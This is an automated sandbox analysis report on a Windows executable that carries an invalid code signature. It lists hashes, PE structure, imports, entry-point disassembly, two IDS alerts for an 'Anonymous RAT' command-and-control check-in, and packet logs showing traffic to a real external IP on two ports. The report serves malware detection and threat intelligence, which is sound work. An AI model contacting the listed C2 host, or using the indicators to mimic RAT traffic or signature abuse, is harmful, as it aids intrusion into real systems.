                                                                SHA512:b4c0f32e59f403b011842c7df7fa390441067fc3257d272707d8f74b09e943c53646211d64af5b8cdf678b970c00f9e47d4affe70b360145612c2c357ad81fc6
                                                                SSDEEP:786432:BuvQnP5UsAxHV0/+LGoxUxz/IWBN+UpdwuCLRchZ7iiH8E4Jfc+p6:EqP5GHV0/4TWBN+IdULRS+iH8E6C
                                                                TLSH:1087335F3694F3FFC2EBDAF99415F18EE53B6A2E116249256B41C2013F6430A8CC63A5
                                                                File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...~.&L.....................N...............0....@..........................................................................P...........................).
                                                                Icon Hash:878fd7f3b9353593
                                                                Entrypoint:0x411def
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:
                                                                Time Stamp:0x4C26F87E [Sun Jun 27 07:06:38 2010 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:b5a014d7eeb4c2042897567e1288a095
                                                                Signature Valid:false
                                                                Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                Error Number:-2146869232
                                                                Not Before, Not After
                                                                • 18/07/2022 01:00:00 18/07/2024 00:59:59
                                                                Subject Chain
                                                                • CN=Incredibuild Software Ltd., O=Incredibuild Software Ltd., S=Tel Aviv, C=IL
                                                                Version:3
                                                                Thumbprint MD5:8164525B12F9B6829CCD5054865F2D41
                                                                Thumbprint SHA-1:583F01EE72450A9945FB1CFA539BAAB983D3F1D9
                                                                Thumbprint SHA-256:2EBD549CFBD28201F8773F370E920A21BB010F577BA74B4726332D2CE7836F69
                                                                Serial:7098774ED29B0565AB114EF2F2871CF7
                                                                Instruction
                                                                push ebp
                                                                mov ebp, esp
                                                                push FFFFFFFFh
                                                                push 00414C50h
                                                                push 00411F80h
                                                                mov eax, dword ptr fs:[00000000h]
                                                                push eax
                                                                mov dword ptr fs:[00000000h], esp
                                                                sub esp, 68h
                                                                push ebx
                                                                push esi
                                                                push edi
                                                                mov dword ptr [ebp-18h], esp
                                                                xor ebx, ebx
                                                                mov dword ptr [ebp-04h], ebx
                                                                push 00000002h
                                                                call dword ptr [00413184h]
                                                                pop ecx
                                                                or dword ptr [00419924h], FFFFFFFFh
                                                                or dword ptr [00419928h], FFFFFFFFh
                                                                call dword ptr [00413188h]
                                                                mov ecx, dword ptr [0041791Ch]
                                                                mov dword ptr [eax], ecx
                                                                call dword ptr [0041318Ch]
                                                                mov ecx, dword ptr [00417918h]
                                                                mov dword ptr [eax], ecx
                                                                mov eax, dword ptr [00413190h]
                                                                mov eax, dword ptr [eax]
                                                                mov dword ptr [00419920h], eax
                                                                call 00007F6969132F42h
                                                                cmp dword ptr [00417710h], ebx
                                                                jne 00007F6969132E2Eh
                                                                push 00411F78h
                                                                call dword ptr [00413194h]
                                                                pop ecx
                                                                call 00007F6969132F14h
                                                                push 00417048h
                                                                push 00417044h
                                                                call 00007F6969132EFFh
                                                                mov eax, dword ptr [00417914h]
                                                                mov dword ptr [ebp-6Ch], eax
                                                                lea eax, dword ptr [ebp-6Ch]
                                                                push eax
                                                                push dword ptr [00417910h]
                                                                lea eax, dword ptr [ebp-64h]
                                                                push eax
                                                                lea eax, dword ptr [ebp-70h]
                                                                push eax
                                                                lea eax, dword ptr [ebp-60h]
                                                                push eax
                                                                call dword ptr [0041319Ch]
                                                                push 00417040h
                                                                push 00417000h
                                                                call 00007F6969132ECCh
                                                                Name | Virtual Address | Virtual Size | Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x150dc | 0xb4 | .rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1a000 | 0x13c0 | .rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x22e97ac | 0x2918 |
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x13000 | 0x310 | .rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                .text | 0x1000 | 0x11317 | 0x11400 | 797279c5ab1a163aed1f2a528f9fe3ce | False | 0.6174988677536232 | data | 6.576987441854239 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata | 0x13000 | 0x30ea | 0x3200 | 1359639b02bcb8f0a8743e6ead1c0030 | False | 0.43828125 | data | 5.549434098115495 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data | 0x17000 | 0x292c | 0x800 | 9415c9c8dea3245d6d73c23393e27d8e | False | 0.431640625 | data | 3.6583182363171756 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc | 0x1a000 | 0x13c0 | 0x1400 | 5293a0fb2c46166ce21247d17e837639 | False | 0.3568359375 | data | 4.96958597460067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                RT_ICON | 0x1a250 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.3709677419354839
                                                                RT_ICON | 0x1a538 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.6081081081081081
                                                                RT_MENU | 0x1a660 | 0x4a | data | English | United States | 0.8648648648648649
                                                                RT_DIALOG | 0x1a6ac | 0xf2 | data | English | United States | 0.7148760330578512
                                                                RT_STRING | 0x1a7a0 | 0x40 | data | English | United States | 0.59375
                                                                RT_GROUP_ICON | 0x1a7e0 | 0x22 | data | English | United States | 1.0
                                                                RT_VERSION | 0x1a804 | 0x314 | data | English | United States | 0.44416243654822335
                                                                RT_MANIFEST | 0x1ab18 | 0x60f | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.4229529335912315
                                                                RT_MANIFEST | 0x1b128 | 0x298 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4894578313253012
                                                                DLL | Import
                                                                COMCTL32.dll |
                                                                KERNEL32.dll | GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, LoadLibraryA, LockResource, LoadResource, SizeofResource, FindResourceExA, MulDiv, GlobalFree, GlobalAlloc, lstrcmpiA, GetSystemDefaultLCID, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, MultiByteToWideChar, GetLocaleInfoW, lstrlenA, lstrcmpiW, GetEnvironmentVariableW, lstrcmpW, GlobalMemoryStatusEx, VirtualAlloc, WideCharToMultiByte, ExpandEnvironmentStringsW, RemoveDirectoryW, FindClose, FindNextFileW, DeleteFileW, FindFirstFileW, SetThreadLocale, GetLocalTime, GetSystemTimeAsFileTime, lstrlenW, GetTempPathW, SetEnvironmentVariableW, CloseHandle, CreateFileW, GetDriveTypeW, SetCurrentDirectoryW, GetModuleFileNameW, GetCommandLineW, GetVersionExW, CreateEventW, SetEvent, ResetEvent, InitializeCriticalSection, TerminateThread, ResumeThread, SuspendThread, IsBadReadPtr, LocalFree, lstrcpyW, FormatMessageW, GetSystemDirectoryW, DeleteCriticalSection, GetFileSize, SetFilePointer, ReadFile, SetFileTime, SetEndOfFile, EnterCriticalSection, LeaveCriticalSection, WaitForMultipleObjects, GetModuleHandleA, SystemTimeToFileTime, GetLastError, CreateThread, WaitForSingleObject, GetExitCodeThread, Sleep, SetLastError, SetFileAttributesW, GetDiskFreeSpaceExW, lstrcatW, ExitProcess, CompareFileTime, GetStartupInfoA
                                                                USER32.dll | CharUpperW, EndDialog, DestroyWindow, KillTimer, ReleaseDC, DispatchMessageW, GetMessageW, SetTimer, CreateWindowExW, ScreenToClient, GetWindowRect, wsprintfW, GetParent, GetSystemMenu, EnableMenuItem, EnableWindow, MessageBeep, LoadIconW, LoadImageW, wvsprintfW, IsWindow, DefWindowProcW, CallWindowProcW, DrawIconEx, DialogBoxIndirectParamW, GetWindow, ClientToScreen, GetDC, DrawTextW, ShowWindow, SystemParametersInfoW, SetFocus, SetWindowLongW, GetSystemMetrics, GetClientRect, GetDlgItem, GetKeyState, MessageBoxA, wsprintfA, SetWindowTextW, GetSysColor, GetWindowTextLengthW, GetWindowTextW, GetClassNameA, GetWindowLongW, GetMenu, SetWindowPos, CopyImage, SendMessageW, GetWindowDC
                                                                GDI32.dll | GetCurrentObject, StretchBlt, SetStretchBltMode, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, GetObjectW, GetDeviceCaps, DeleteObject, CreateFontIndirectW, DeleteDC
                                                                SHELL32.dll | SHGetFileInfoW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetMalloc, ShellExecuteExW, SHGetSpecialFolderPathW, ShellExecuteW
                                                                ole32.dll | CoInitialize, CreateStreamOnHGlobal, CoCreateInstance
                                                                OLEAUT32.dll | VariantClear, OleLoadPicture, SysAllocString
                                                                MSVCRT.dll | __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, memset, _wcsnicmp, strncmp, malloc, memmove, _wtol, memcpy, free, memcmp, _purecall, ??2@YAPAXI@Z, ??3@YAXPAX@Z, _except_handler3, _controlfp
                                                                Language of compilation system | Country where language is spoken | Map
                                                                English | United States |
                                                                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                2024-12-27T13:10:23.432699+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 49795 | 118.107.44.219 | 19091 | TCP
                                                                2024-12-27T13:11:34.693883+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 49803 | 118.107.44.219 | 19091 | TCP
                                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                Dec 27, 2024 13:10:19.074223042 CET | 49786 | 18852 | 192.168.2.4 | 118.107.44.219
                                                                Dec 27, 2024 13:10:19.194534063 CET | 18852 | 49786 | 118.107.44.219 | 192.168.2.4
                                                                Dec 27, 2024 13:10:19.194606066 CET | 49786 | 18852 | 192.168.2.4 | 118.107.44.219
                                                                Dec 27, 2024 13:10:20.586196899 CET | 18852 | 49786 | 118.107.44.219 | 192.168.2.4
                                                                Dec 27, 2024 13:10:20.586251974 CET | 18852 | 49786 | 118.107.44.219 | 192.168.2.4
                                                                Dec 27, 2024 13:10:20.586266041 CET | 18852 | 49786 | 118.107.44.219 | 192.168.2.4
                                                                Dec 27, 2024 13:10:20.586312056 CET | 49786 | 18852 | 192.168.2.4 | 118.107.44.219
                                                                Dec 27, 2024 13:10:20.586386919 CET | 18852 | 49786 | 118.107.44.219 | 192.168.2.4
                                                                Dec 27, 2024 13:10:20.586400032 CET | 18852 | 49786 | 118.107.44.219 | 192.168.2.4
                                                                Dec 27, 2024 13:10:20.586412907 CET | 18852 | 49786 | 118.107.44.219 | 192.168.2.4
                                                                Dec 27, 2024 13:10:20.586424112 CET | 49786 | 18852 | 192.168.2.4 | 118.107.44.219
                                                                Dec 27, 2024 13:10:20.586426020 CET | 18852 | 49786 | 118.107.44.219 | 192.168.2.4
                                                                Dec 27, 2024 13:10:20.586441040 CET | 18852 | 49786 | 118.107.44.219 | 192.168.2.4
                                                                Dec 27, 2024 13:10:20.586460114 CET | 49786 | 18852 | 192.168.2.4 | 118.107.44.219
                                                                Dec 27, 2024 13:10:20.586483002 CET | 49786 | 18852 | 192.168.2.4 | 118.107.44.219
                                                                Dec 27, 2024 13:10:20.586520910 CET | 18852 | 49786 | 118.107.44.219 | 192.168.2.4
                                                                Dec 27, 2024 13:10:20.586560965 CET | 18852 | 49786 | 118.107.44.219 | 192.168.2.4
                                                                Dec 27, 2024 13:10:20.586599112 CET | 49786 | 18852 | 192.168.2.4 | 118.107.44.219
                                                                Dec 27, 2024 13:10:20.705796003 CET | 18852 | 49786 | 118.107.44.219 | 192.168.2.4
                                                                Dec 27, 2024 13:10:20.705858946 CET | 18852 | 49786 | 118.107.44.219 | 192.168.2.4
                                                                Dec 27, 2024 13:10:20.705903053 CET | 49786 | 18852 | 192.168.2.4 | 118.107.44.219
                                                                Dec 27, 2024 13:10:20.710021019 CET | 18852 | 49786 | 118.107.44.219 | 192.168.2.4
                                                                Dec 27, 2024 13:10:20.756094933 CET | 49786 | 18852 | 192.168.2.4 | 118.107.44.219
                                                                Dec 27, 2024 13:10:20.808727980 CET | 18852 | 49786 | 118.107.44.219 | 192.168.2.4
                                                                Dec 27, 2024 13:10:20.808829069 CET | 18852 | 49786 | 118.107.44.219 | 192.168.2.4
                                                                Dec 27, 2024 13:10:20.808882952 CET | 49786 | 18852 | 192.168.2.4 | 118.107.44.219
                                                                Dec 27, 2024 13:10:20.812786102 CET | 18852 | 49786 | 118.107.44.219 | 192.168.2.4
                                                                Dec 27, 2024 13:10:20.812891006 CET | 18852 | 49786 | 118.107.44.219 | 192.168.2.4
                                                                Dec 27, 2024 13:10:20.812949896 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.821135998 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.821234941 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.822840929 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.829514027 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.829627037 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.829685926 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.837877035 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.838007927 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.838056087 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.846340895 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.846481085 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.846645117 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.854700089 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.854806900 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.854964972 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.863153934 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.863251925 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.863306046 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.871601105 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.871767044 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.872163057 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.879854918 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.879961014 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.880225897 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.888262033 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.888339043 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.888456106 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.022339106 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.022391081 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.022439957 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.025182962 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.025202036 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.025299072 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.030771971 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.030837059 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.030884981 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.036484003 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.036621094 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.036675930 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.042148113 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.042263985 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.042309046 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.047833920 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.047955036 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.048141956 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.053466082 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.053571939 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.053616047 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.059149981 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.059243917 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.059333086 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.064780951 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.064917088 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.065021992 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.070489883 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.070663929 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.070708036 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.076252937 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.076364994 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.076472044 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.081801891 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.081919909 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.082076073 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.087569952 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.087663889 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.087718964 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.093271017 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.093456984 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.093504906 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.098948002 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.099075079 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.099142075 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.104670048 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.104767084 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.104834080 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.110192060 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.110321999 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.110367060 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.115909100 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.116012096 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.116060972 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.121577024 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.121704102 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.121824980 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.127291918 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.177962065 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.235469103 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.235487938 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.235536098 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.237490892 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.237622976 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.237670898 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.241805077 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.241883039 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.242098093 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.246017933 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.246133089 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.246179104 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.250164986 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.250348091 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.250391006 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.254247904 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.254343987 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.254641056 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.258245945 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.258361101 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.258486986 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.262274981 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.262371063 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.262430906 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.266357899 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.266427040 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.266537905 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.270517111 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.270591974 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.270641088 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.274394989 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.274488926 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.274535894 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.278523922 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.278568029 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:23.312361956 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:23.432190895 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:23.432373047 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:23.432698965 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:23.552122116 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:24.978391886 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:24.981702089 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.101330042 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.101344109 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.101355076 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.515129089 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.515167952 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.515181065 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.515228033 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.515285015 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.515299082 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.515310049 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.515327930 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.515330076 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.515357971 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.515503883 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.515516996 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.515527964 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.515552044 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.515583038 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.523513079 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.568588018 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.635117054 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.678117990 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.724247932 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.724282980 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.724338055 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.728302956 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.729870081 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.730000019 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.730020046 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.738226891 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.738293886 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.738322020 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.744712114 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.744735003 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.744766951 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.753221989 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.753343105 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.753365040 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.761482954 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.761584997 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.761600018 CET1909149795118.107.44.219192.168.2.4
